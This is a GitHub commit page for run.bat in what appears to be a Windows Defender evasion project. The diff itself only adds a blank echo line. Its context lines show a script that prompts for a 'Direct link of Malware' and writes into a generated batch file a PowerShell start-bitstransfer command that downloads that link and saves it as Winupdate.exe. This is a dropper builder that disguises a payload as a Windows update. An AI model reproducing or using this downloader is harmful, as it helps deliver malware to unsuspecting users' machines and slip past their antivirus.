Skip to content

Commit

Permalink
Update run.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Jul 19, 2021
1 parent 7987cad commit e201927
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion run.bat
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,8 @@ echo.
set /p a="Enter the Direct link of Malware : "
if [%a%]==[] (goto error ) else (goto main)
:main
echo Your Url is : %a%
echo.
echo Your Url is : %a%
echo. >>Defeat-Defender.bat
echo powershell -command "start-bitstransfer %a% .\Winupdate.exe" >>Defeat-Defender.bat
echo. >>Defeat-Defender.bat
Expand Down

0 comments on commit e201927

Please sign in to comment.